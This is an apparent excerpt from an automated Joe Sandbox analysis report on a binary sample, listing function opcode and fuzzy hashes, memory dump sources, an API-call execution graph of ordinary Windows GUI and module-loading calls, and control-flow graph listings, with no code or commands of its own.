                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c3bea80e887cdef1733be301b84a8f8c1a3eb0c0395f14159c3ed11c7446cdad
                                                • Instruction ID: 283504c1ad1f93c12f713939563401143bcf6133daa9b7f1e0f40b5af813fa1a
                                                • Opcode Fuzzy Hash: c3bea80e887cdef1733be301b84a8f8c1a3eb0c0395f14159c3ed11c7446cdad
                                                • Instruction Fuzzy Hash: 56019274A0420AEFCB40EFA9D580A9EFBB1FB44308F548AA9D514A7314E770AE459B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5D50 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30c8e0fb035840ef517324b1e096b5569986582e1cefe7fa7f9e0a152adc6203
                                                • Instruction ID: 103a9c9f45e907df0baf5079af3503aa7aa5bdefdb8e37c00e2be959cd1d7e52
                                                • Opcode Fuzzy Hash: 30c8e0fb035840ef517324b1e096b5569986582e1cefe7fa7f9e0a152adc6203
                                                • Instruction Fuzzy Hash: FA015E7095024AAFC754FF68E4D4ADDB7B1FB80308F544A69C50497228FB307E498B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A4238 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1fbbe70febb175e42974c4793f99e375d6f444235e82f0c91ab62b16f851d180
                                                • Instruction ID: 31533997d0634a13250906464843a9625fb4c4623ddc698feb06fd28cd45f59d
                                                • Opcode Fuzzy Hash: 1fbbe70febb175e42974c4793f99e375d6f444235e82f0c91ab62b16f851d180
                                                • Instruction Fuzzy Hash: A2F06D70D14208EFEB10EFA5D5593EDBBB4EB44305F5484B9C501A3384E3B98688DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5860 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d448cf9adb180095e247f725584d00fd458de97982251cf3a4d7f8c907e88c17
                                                • Instruction ID: eced765b95152032fa8c2adde7f5f21b71c8ee621ea44a6475ad0b5314d7574f
                                                • Opcode Fuzzy Hash: d448cf9adb180095e247f725584d00fd458de97982251cf3a4d7f8c907e88c17
                                                • Instruction Fuzzy Hash: 54F0BD34641204DFC304DF68D688D19B7F4FF0A315B2181D8E909AB331CB31EE40DA04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A4860 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d4f7cc648b71b7ea4a3df601791171dc7bd80148b53352dee1b4bc001988927
                                                • Instruction ID: 505b893eede7b91ac9d8ec21105c58fab26bb54f94d8f5c9b6dd735f47e48eb4
                                                • Opcode Fuzzy Hash: 4d4f7cc648b71b7ea4a3df601791171dc7bd80148b53352dee1b4bc001988927
                                                • Instruction Fuzzy Hash: 1FF03770C01248EFCB14EFA8E9487AEFBF0EB09304F1486AAC914A3345D7709A41DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5CBA Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d019d3b54c4e608e075c76c7a02b0a61bfc53f4a22ddb7e6b19d61ee654ae77b
                                                • Instruction ID: 35dd4e8e05a36eee62aef6be2e9cacd8788767eb815866ceddbbbf2a6eabd19a
                                                • Opcode Fuzzy Hash: d019d3b54c4e608e075c76c7a02b0a61bfc53f4a22ddb7e6b19d61ee654ae77b
                                                • Instruction Fuzzy Hash: C2F02070981348DFC344EFB4E90869D7BF0FB01314B0006AEC401E7222D7341E05CB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A6679 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ceef15cc71a363a67460f68d22bd2dceb2f2b978ae75a5b11a51036b90981c71
                                                • Instruction ID: 7238ba3f65da7d04c996b6ff19add786614b767331d59d667625b9485aa65343
                                                • Opcode Fuzzy Hash: ceef15cc71a363a67460f68d22bd2dceb2f2b978ae75a5b11a51036b90981c71
                                                • Instruction Fuzzy Hash: 9AE08C705EA3468FD32A9AA4E9522A97BB0AB43324F0402BEC04587162D33A0847CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A66B0 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0914d9ad1d1c720a133e45c112a8cefeff9b4e3a701a15a4d723f87a1f450d82
                                                • Instruction ID: 154045953208ac12fcc857656a7bc9bce6da69586d901a87be929bed65fc6d3b
                                                • Opcode Fuzzy Hash: 0914d9ad1d1c720a133e45c112a8cefeff9b4e3a701a15a4d723f87a1f450d82
                                                • Instruction Fuzzy Hash: F1E08C705993859FC316EAA4EC156697BB8AB42324F0501AEC600C7162D7296892CB93
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5CC8 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 77bc515c7385c18c6ad59c819ac0186c1a0c1d629967527c005e13cdec139573
                                                • Instruction ID: 9b62220c2084af263574f31b297b39d3768a7fe0de6fe802f5eac6be84655f73
                                                • Opcode Fuzzy Hash: 77bc515c7385c18c6ad59c819ac0186c1a0c1d629967527c005e13cdec139573
                                                • Instruction Fuzzy Hash: 8FE08670541209EFD714EFB8F94869EB7B5FB04308F500AA9C505E3214EB312F04DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A6038 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0954405fbb328c78e4f2f00cd7ba1ab09b52a5ef946ed572b8ce1f16fd0e8da
                                                • Instruction ID: 77f69a691630c61a1f26988598fea957c75b50873c41e58eaccda0c051094323
                                                • Opcode Fuzzy Hash: c0954405fbb328c78e4f2f00cd7ba1ab09b52a5ef946ed572b8ce1f16fd0e8da
                                                • Instruction Fuzzy Hash: 33D01270455208DFC324EFA8FD5D729BBBCF70A355F405299D90853688EB316990CB96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A6688 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a360695014f33427d0086e6305947f55888126abbbff61cb5bbfeb455741847
                                                • Instruction ID: f544366ac14fda5e3c59dee4f35bcfa46138d1652ca7450cad57d15a21e5af45
                                                • Opcode Fuzzy Hash: 0a360695014f33427d0086e6305947f55888126abbbff61cb5bbfeb455741847
                                                • Instruction Fuzzy Hash: 33C012744AA61D9FC314EE98F954729BB78F701754F8402A9890453254EB316980CB96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A66C0 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 074a2982592c5162a3a2296376514919a1e51fdf11fc202472ac85d8c565fc03
                                                • Instruction ID: 8c236270f1d592f4feebf5b352f4e37d6eb865c136a462d64d362e38f07673cf
                                                • Opcode Fuzzy Hash: 074a2982592c5162a3a2296376514919a1e51fdf11fc202472ac85d8c565fc03
                                                • Instruction Fuzzy Hash: 70C02270495208EFC300EA98F804729B77CE301318F800299860453200EB312880CA82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:14.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:348
                                                Total number of Limit Nodes:23
                                                execution_graph 34825 6ac4db8 34826 6ac4dfa 34825->34826 34827 6ac4e00 SetWindowTextW 34825->34827 34826->34827 34828 6ac4e31 34827->34828 34829 6ac61b8 34830 6ac61d8 34829->34830 34834 6ac61ff SendMessageW 34830->34834 34836 6ac6200 SendMessageW 34830->34836 34831 6ac61e9 34835 6ac626c 34834->34835 34835->34831 34837 6ac626c 34836->34837 34837->34831 35011 6ac8e78 35012 6ac8e85 35011->35012 35016 6ac8ea8 35012->35016 35021 6ac8e99 35012->35021 35013 6ac8e94 35017 6ac8eb8 35016->35017 35019 6ac61ff SendMessageW 35017->35019 35020 6ac6200 SendMessageW 35017->35020 35018 6ac8ec9 35018->35013 35019->35018 35020->35018 35022 6ac8eb8 35021->35022 35024 6ac61ff SendMessageW 35022->35024 35025 6ac6200 SendMessageW 35022->35025 35023 6ac8ec9 35023->35013 35024->35023 35025->35023 35239 9d8b68 35240 9d8b77 35239->35240 35242 9d9068 2 API calls 35239->35242 35243 9d9058 35239->35243 35242->35240 35244 9d907b 35243->35244 35246 9d9093 35244->35246 35249 9d92f0 LoadLibraryExW 35244->35249 35250 9d92e0 LoadLibraryExW 35244->35250 35245 9d908b 35245->35246 35247 9d9290 GetModuleHandleW 35245->35247 35246->35240 35248 9d92bd 35247->35248 35248->35240 35249->35245 35250->35245 34838 6ac4db0 34839 6ac4db6 SetWindowTextW 34838->34839 34842 6ac4d81 34838->34842 34841 6ac4e31 34839->34841 34881 6ac44e0 34882 6ac44f9 34881->34882 34884 6ac4503 34881->34884 34882->34884 34885 6ac3588 34882->34885 34887 6ac3593 34885->34887 34889 6aca1ac 34887->34889 34888 6acad4a 34888->34884 34891 6aca1b7 34889->34891 34890 6acb3be 34890->34888 34891->34890 34893 6ac3474 34891->34893 34895 6ac347f 34893->34895 34894 6acce9e 34894->34890 34895->34894 34896 6acce9c KiUserCallbackDispatcher 34895->34896 34896->34894 34897 6ac3de0 34898 6ac3e19 34897->34898 34899 6ac3eb7 34898->34899 34905 9dda58 34898->34905 34913 9dda70 34898->34913 34900 6ac409f 34899->34900 34921 9db904 34899->34921 34925 9dcf11 34899->34925 34907 9ddaa1 34905->34907 34908 9ddb93 34905->34908 34906 9ddaad 34906->34899 34907->34906 34909 9ddaee 34907->34909 34929 9dddb8 34907->34929 34908->34899 34932 9de773 34909->34932 34937 9de780 34909->34937 34915 9ddaa1 34913->34915 34916 9ddb93 34913->34916 34914 9ddaad 34914->34899 34915->34914 34917 9ddaee 34915->34917 34920 9dddb8 2 API calls 34915->34920 34916->34899 34918 9de780 2 API calls 34917->34918 34919 9de773 2 API calls 34917->34919 34918->34916 34919->34916 34920->34917 34922 9db90f 34921->34922 34924 9dcfb5 34922->34924 34976 9db674 34922->34976 34924->34900 34926 9dcfb5 34925->34926 34927 9dcf3f 34925->34927 34926->34900 34927->34926 34928 9db674 4 API calls 34927->34928 34928->34926 34942 9d9068 34929->34942 34931 9dddc1 34931->34909 34933 9de7aa 34932->34933 34934 9de851 34933->34934 34962 9df528 34933->34962 34965 9df420 34933->34965 34938 9de7aa 34937->34938 34939 9de851 34938->34939 34940 9df528 CreateWindowExW 34938->34940 34941 9df420 2 API calls 34938->34941 34940->34939 34941->34939 34943 9d907b 34942->34943 34945 9d9093 34943->34945 34950 9d92f0 34943->34950 34954 9d92e0 34943->34954 34944 9d908b 34944->34945 34946 9d9290 GetModuleHandleW 34944->34946 34945->34931 34947 9d92bd 34946->34947 34947->34931 34951 9d9304 34950->34951 34952 9d9329 34951->34952 34958 9d8c94 34951->34958 34952->34944 34955 9d9304 34954->34955 34956 9d8c94 LoadLibraryExW 34955->34956 34957 9d9329 34955->34957 34956->34957 34957->34944 34959 9d94d0 LoadLibraryExW 34958->34959 34961 9d9549 34959->34961 34961->34952 34963 9df55d 34962->34963 34972 9dd33c 34962->34972 34963->34934 34966 9df565 CreateWindowExW 34965->34966 34967 9df531 34965->34967 34971 9df69c 34966->34971 34968 9dd33c CreateWindowExW 34967->34968 34969 9df55d 34968->34969 34969->34934 34971->34971 34973 9df578 CreateWindowExW 34972->34973 34975 9df69c 34973->34975 34977 9db67f 34976->34977 34979 9dd89f 34977->34979 34980 9dd17c 34977->34980 34979->34924 34981 9dd187 34980->34981 34983 9dd972 34981->34983 34985 9dda58 4 API calls 34981->34985 34986 9dda70 4 API calls 34981->34986 34988 9dda11 34981->34988 34989 6ac8b48 34981->34989 34993 6ac8b22 34981->34993 34982 9dd17c 4 API calls 34982->34983 34983->34982 34983->34988 34985->34983 34986->34983 34988->34979 34990 6ac8b75 34989->34990 34991 9dda58 4 API calls 34989->34991 34992 9dda70 4 API calls 34989->34992 34991->34990 34992->34990 34995 9dda58 4 API calls 34993->34995 34996 9dda70 4 API calls 34993->34996 34994 6ac8b75 34995->34994 34996->34994 35026 6ac8270 35028 6ac8297 35026->35028 35027 6ac82f8 35028->35027 35030 9db674 4 API calls 35028->35030 35031 9dd868 35028->35031 35030->35027 35032 9dd17c 4 API calls 35031->35032 35033 9dd89f 35032->35033 35033->35027 35034 6acbdc0 35036 6acbdd2 35034->35036 35035 6ac3474 KiUserCallbackDispatcher 35037 6acbeed 35035->35037 35036->35035 35036->35037 34997 9db050 34998 9db0b6 34997->34998 34999 9db165 34998->34999 35002 9db210 34998->35002 35005 9db200 34998->35005 35008 9d9020 35002->35008 35006 9db23e 35005->35006 35007 9d9020 DuplicateHandle 35005->35007 35006->34999 35007->35006 35009 9db278 DuplicateHandle 35008->35009 35010 9db23e 35009->35010 35010->34999 35038 9d4170 35039 9d418d 35038->35039 35040 9d41b0 35039->35040 35043 9d41d4 35039->35043 35048 9d3d34 35040->35048 35042 9d41c6 35052 6ac3060 35042->35052 35057 6ac304f 35042->35057 35044 9d3d34 8 API calls 35043->35044 35045 9d41cf 35044->35045 35049 9d3d3f 35048->35049 35062 9d3d44 35049->35062 35051 9d433e 35051->35042 35053 6ac3072 35052->35053 35149 6ac316a 35053->35149 35154 6ac3168 35053->35154 35058 6ac3072 35057->35058 35060 6ac3168 14 API calls 35058->35060 35061 6ac316a 14 API calls 35058->35061 35059 6ac3092 35059->35045 35060->35059 35061->35059 35063 9d3d4f 35062->35063 35066 9d3910 35063->35066 35065 9d43e5 35065->35051 35067 9d391b 35066->35067 35070 9d3940 35067->35070 35069 9d44c2 35069->35065 35071 9d394b 35070->35071 35074 9d3f70 35071->35074 35073 9d45d1 35073->35069 35075 9d3f7b 35074->35075 35081 9d6538 35075->35081 35077 9d6ba4 35077->35073 35078 9d697b 35078->35077 35086 9dac70 35078->35086 35091 9dac80 35078->35091 35082 9d6543 35081->35082 35083 9d770a 35082->35083 35096 9d7758 35082->35096 35100 9d7768 35082->35100 35083->35078 35088 9daca1 35086->35088 35087 9dacc5 35087->35077 35088->35087 35104 9daf38 35088->35104 35108 9daf2b 35088->35108 35092 9daca1 35091->35092 35093 9dacc5 35092->35093 35094 9daf38 8 API calls 35092->35094 35095 9daf2b 8 API calls 35092->35095 35093->35077 35094->35093 35095->35093 35097 9d77ab 35096->35097 35098 9d77b6 KiUserCallbackDispatcher 35097->35098 35099 9d77e0 35097->35099 35098->35099 35099->35083 35101 9d77ab 35100->35101 35102 9d77b6 KiUserCallbackDispatcher 35101->35102 35103 9d77e0 35101->35103 35102->35103 35103->35083 35105 9daf45 35104->35105 35107 9daf7f 35105->35107 35112 9d8f98 35105->35112 35107->35087 35109 9daf45 35108->35109 35110 9d8f98 8 API calls 35109->35110 35111 9daf7f 35109->35111 35110->35111 35111->35087 35113 9d8fa3 35112->35113 35115 9dbc78 35113->35115 35116 9d903c 35113->35116 35115->35115 35117 9d9047 35116->35117 35118 9d3f70 8 API calls 35117->35118 35119 9dbce7 35118->35119 35125 9dbcf5 35119->35125 35130 9dbd60 35119->35130 35137 9dbd51 35119->35137 35121 9dbd0f 35122 9db674 4 API calls 35121->35122 35123 9dbd16 35122->35123 35128 9dda58 4 API calls 35123->35128 35129 9dda70 4 API calls 35123->35129 35124 9dbd20 35124->35115 35144 9db664 35125->35144 35128->35124 35129->35124 35131 9dbd8e 35130->35131 35132 9dbe5f 35131->35132 35134 9dbdcf 35131->35134 35136 9dbecb 35131->35136 35133 9db674 LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 35132->35133 35132->35136 35133->35136 35135 9dbe5a KiUserCallbackDispatcher 35134->35135 35134->35136 35135->35136 35138 9dbd8e 35137->35138 35139 9dbe5f 35138->35139 35141 9dbdcf 35138->35141 35143 9dbecb 35138->35143 35140 9db674 LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 35139->35140 35139->35143 35140->35143 35142 9dbe5a KiUserCallbackDispatcher 35141->35142 35141->35143 35142->35143 35147 9db66f 35144->35147 35145 9db904 LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 35146 9dce84 35145->35146 35146->35121 35147->35145 35148 9dce89 35147->35148 35148->35121 35150 6ac3190 35149->35150 35159 6ac35f0 35150->35159 35169 6ac35f2 35150->35169 35151 6ac31a5 35155 6ac3190 35154->35155 35157 6ac35f0 14 API calls 35155->35157 35158 6ac35f2 14 API calls 35155->35158 35156 6ac31a5 35157->35156 35158->35156 35164 6ac3615 35159->35164 35160 6ac36be 35161 6ac3314 7 API calls 35160->35161 35162 6ac3814 35160->35162 35161->35162 35163 6ac384e 35162->35163 35184 6ce0b20 35162->35184 35194 6ce0b12 35162->35194 35204 6ce1460 35162->35204 35163->35151 35164->35160 35164->35163 35179 6ac3314 35164->35179 35172 6ac3615 35169->35172 35170 6ac3314 7 API calls 35171 6ac3814 35170->35171 35174 6ac384e 35171->35174 35176 6ce0b12 7 API calls 35171->35176 35177 6ce0b20 7 API calls 35171->35177 35178 6ce1460 KiUserCallbackDispatcher 35171->35178 35173 6ac3314 7 API calls 35172->35173 35172->35174 35175 6ac36be 35172->35175 35173->35175 35174->35151 35175->35170 35175->35171 35176->35174 35177->35174 35178->35174 35180 6ac331f 35179->35180 35208 6ac3a60 35180->35208 35216 6ac3a50 35180->35216 35181 6ac3a4b 35181->35160 35185 6ce0b85 35184->35185 35186 6ce0bd2 35185->35186 35192 6ce1460 KiUserCallbackDispatcher 35185->35192 35224 6ce10e8 PeekMessageW 35185->35224 35226 6ce10e2 35185->35226 35229 6ce13b0 35185->35229 35233 6ce13b8 KiUserCallbackDispatcher 35185->35233 35235 6ce1c90 DispatchMessageW 35185->35235 35237 6ce1c88 DispatchMessageW 35185->35237 35186->35163 35192->35185 35196 6ce0b85 35194->35196 35195 6ce0bd2 35195->35163 35196->35195 35197 6ce1c88 DispatchMessageW 35196->35197 35198 6ce1c90 DispatchMessageW 35196->35198 35199 6ce13b8 KiUserCallbackDispatcher 35196->35199 35200 6ce1460 KiUserCallbackDispatcher 35196->35200 35201 6ce13b0 KiUserCallbackDispatcher 35196->35201 35202 6ce10e8 PeekMessageW 35196->35202 35203 6ce10e2 PeekMessageW 35196->35203 35197->35196 35198->35196 35199->35196 35200->35196 35201->35196 35202->35196 35203->35196 35205 6ce1414 KiUserCallbackDispatcher 35204->35205 35206 6ce1463 35204->35206 35207 6ce142c 35205->35207 35206->35163 35207->35163 35210 6ac3a86 35208->35210 35209 6ac3a9a 35209->35181 35210->35209 35212 6ac3b85 35210->35212 35214 9dbd51 5 API calls 35210->35214 35215 9dbd60 5 API calls 35210->35215 35211 6ac3d3f 35211->35181 35212->35211 35213 6ac3474 KiUserCallbackDispatcher 35212->35213 35213->35211 35214->35212 35215->35212 35218 6ac3a86 35216->35218 35217 6ac3a9a 35217->35181 35218->35217 35221 6ac3b85 35218->35221 35222 9dbd51 5 API calls 35218->35222 35223 9dbd60 5 API calls 35218->35223 35219 6ac3d3f 35219->35181 35220 6ac3474 KiUserCallbackDispatcher 35220->35219 35221->35219 35221->35220 35222->35221 35223->35221 35225 6ce115f 35224->35225 35225->35185 35227 6ce10e8 PeekMessageW 35226->35227 35228 6ce115f 35227->35228 35228->35185 35230 6ce13b3 KiUserCallbackDispatcher 35229->35230 35232 6ce1364 35229->35232 35231 6ce142c 35230->35231 35231->35185 35232->35185 35234 6ce142c 35233->35234 35234->35185 35236 6ce1cfc 35235->35236 35236->35185 35238 6ce1cfc 35237->35238 35238->35185 34843 6ce6e50 34844 6ce6e68 34843->34844 34846 6ce6e70 34843->34846 34847 6ce6ea7 34846->34847 34853 6aca62f 34847->34853 34858 6aca653 34847->34858 34863 6aca3d8 34847->34863 34870 6aca3e8 34847->34870 34848 6ce6ecb 34854 6aca654 34853->34854 34855 6aca635 34853->34855 34877 6aca928 PostMessageW 34854->34877 34879 6aca921 PostMessageW 34854->34879 34855->34848 34859 6aca666 34858->34859 34861 6aca928 PostMessageW 34859->34861 34862 6aca921 PostMessageW 34859->34862 34860 6aca689 34860->34848 34861->34860 34862->34860 34865 6aca442 34863->34865 34864 6aca4c7 34864->34848 34865->34864 34866 6aca62f 2 API calls 34865->34866 34867 6aca3e8 2 API calls 34865->34867 34868 6aca3d8 2 API calls 34865->34868 34869 6aca653 2 API calls 34865->34869 34866->34864 34867->34864 34868->34864 34869->34864 34871 6aca442 34870->34871 34872 6aca4c7 34871->34872 34873 6aca62f 2 API calls 34871->34873 34874 6aca3e8 2 API calls 34871->34874 34875 6aca3d8 2 API calls 34871->34875 34876 6aca653 2 API calls 34871->34876 34872->34848 34873->34872 34874->34872 34875->34872 34876->34872 34878 6aca994 34877->34878 34878->34855 34880 6aca994 34879->34880 34880->34855

                                                Executed Functions

                                                Function 009DF420 Relevance: 1.8, APIs: 1, Instructions: 256COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 232 9df420-9df52f 233 9df565-9df5de 232->233 234 9df531-9df558 call 9dd33c 232->234 236 9df5e9-9df5f0 233->236 237 9df5e0-9df5e6 233->237 240 9df55d-9df55e 234->240 238 9df5fb-9df69a CreateWindowExW 236->238 239 9df5f2-9df5f8 236->239 237->236 242 9df69c-9df6a2 238->242 243 9df6a3-9df6db 238->243 239->238 242->243 247 9df6dd-9df6e0 243->247 248 9df6e8 243->248 247->248 249 9df6e9 248->249 249->249
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009DF68A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: c6ec4efdecc2557a0ca8983c995d4b7f3d728348705e62c50684458f973c35cc
                                                • Instruction ID: 0005c35421601b3d069ced95034793b9847e93d878620035c756fac46b67f4c3
                                                • Opcode Fuzzy Hash: c6ec4efdecc2557a0ca8983c995d4b7f3d728348705e62c50684458f973c35cc
                                                • Instruction Fuzzy Hash: 12916BB1C09388AFDB16CFA5C8509CDBFB1EF5A340F1A81AFE4849B262D7354845CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009D9068 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 353 9d9068-9d9070 354 9d907b-9d907d 353->354 355 9d9076 call 9d7bf8 353->355 356 9d907f 354->356 357 9d9093-9d9097 354->357 355->354 408 9d9085 call 9d92f0 356->408 409 9d9085 call 9d92e0 356->409 358 9d9099-9d90a3 357->358 359 9d90ab-9d90ec 357->359 358->359 364 9d90ee-9d90f6 359->364 365 9d90f9-9d9107 359->365 360 9d908b-9d908d 360->357 361 9d91c8-9d9288 360->361 401 9d928a-9d928d 361->401 402 9d9290-9d92bb GetModuleHandleW 361->402 364->365 366 9d9109-9d910e 365->366 367 9d912b-9d912d 365->367 369 9d9119 366->369 370 9d9110-9d9117 call 9d7c04 366->370 371 9d9130-9d9137 367->371 376 9d911b-9d9129 369->376 370->376 374 9d9139-9d9141 371->374 375 9d9144-9d914b 371->375 374->375 378 9d914d-9d9155 375->378 379 9d9158-9d9161 call 9d8c54 375->379 376->371 378->379 384 9d916e-9d9173 379->384 385 9d9163-9d916b 379->385 386 9d9175-9d917c 384->386 387 9d9191-9d9195 384->387 385->384 386->387 389 9d917e-9d918e call 9d8c64 call 9d8c74 386->389 406 9d9198 call 9d95e8 387->406 407 9d9198 call 9d95c0 387->407 389->387 391 9d919b-9d919e 393 9d91c1-9d91c7 391->393 394 9d91a0-9d91be 391->394 394->393 401->402 403 9d92bd-9d92c3 402->403 404 9d92c4-9d92d8 402->404 403->404 406->391 407->391 408->360 409->360
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 009D92AE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: a4dacf6a9a0496fd176b3b9ee06de5a44fd610bf59fa09646faf3f7c50c9753d
                                                • Instruction ID: 61bd5340f5fdea0055d2851d125f6aba227c9468f21b35973d394321cd67de1b
                                                • Opcode Fuzzy Hash: a4dacf6a9a0496fd176b3b9ee06de5a44fd610bf59fa09646faf3f7c50c9753d
                                                • Instruction Fuzzy Hash: 9C712370A00B059FD724EF29C48579AB7F5BF88304F008A2ED59ADBB50DB35E845CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009DD320 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 410 9dd320-9dd33d 412 9dd33f-9dd343 410->412 413 9dd398-9dd3a7 410->413 414 9df578-9df5de 412->414 413->414 415 9df5e9-9df5f0 414->415 416 9df5e0-9df5e6 414->416 418 9df5fb-9df633 415->418 419 9df5f2-9df5f8 415->419 416->415 420 9df63b-9df69a CreateWindowExW 418->420 419->418 421 9df69c-9df6a2 420->421 422 9df6a3-9df6db 420->422 421->422 426 9df6dd-9df6e0 422->426 427 9df6e8 422->427 426->427 428 9df6e9 427->428 428->428
                                                APIs
